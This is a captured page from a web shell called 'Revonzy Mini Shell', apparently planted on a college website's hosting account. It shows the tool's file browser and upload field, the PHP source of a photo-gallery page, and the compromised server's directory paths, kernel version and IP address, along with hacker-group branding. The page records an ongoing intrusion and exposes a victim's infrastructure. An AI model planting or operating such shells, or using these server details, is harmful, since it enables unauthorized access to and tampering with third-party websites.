Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/computer-tour-trip.php


<?php
	require_once("78enc22_main7sqww_8d9/lib/functions.php");
	$db =new login_function();
	
?>

<?php
	require_once("header.php");
?>


<div class="parent_colour container">				
	<div class="department-main-section">	
		<br />
		<center><h2 class="head-title">Gallery</h2>
		
						<?php
							require_once("computer-left-panel.php");
						?>
					
				<div class="parent_data_contnr" >
			
					<?php
						require_once("computer-gallery-menu.php");
					?>
					<br /><br />
		<?php
			$department = "Computer Engineering";	
			$section = "Tour And Trip";				
			$details = $db->get_all_gallery_images_of_department_wise_and_section($department,$section);
		if(!empty($details))
		{ 
				$counter =0;
			foreach($details as $record)
			{ 
				$id				=	$details[$counter][0];
				$department		=	$details[$counter][1];
				$section		=	$details[$counter][2];
				$images			=	$details[$counter][3];
				$description	=	$details[$counter][4];
		?>
				<div style="display:inline-table;color:white" >
						<a href="/gallery/<?php echo $images; ?>" target="_blank" ><img src="/gallery/<?php echo $images; ?>" class="img-data"></a>
						<p class="image_caption"><center><?php echo $description;?> </center></p>		
					</div>
			
			
		<?php 
				$counter++;
			}
		}			
		else
		{
		?>
			<p class="image_caption">No Data Found...</p>
		<?php
		}		
		?>
			</div>
			</div>
			</div>
		
	</section><!-- end of service section -->

	
<?php
	require_once("footer.php");
?>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4